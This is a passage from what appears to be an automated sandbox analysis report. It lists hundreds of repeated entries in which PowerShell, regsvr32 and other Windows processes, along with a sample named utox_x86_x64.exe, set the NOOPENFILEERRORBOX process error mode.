                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\regsvr32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\utox_x86_x64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rekeywiz.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rekeywiz.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rekeywiz.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rekeywiz.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rekeywiz.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rekeywiz.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rekeywiz.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\rekeywiz.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
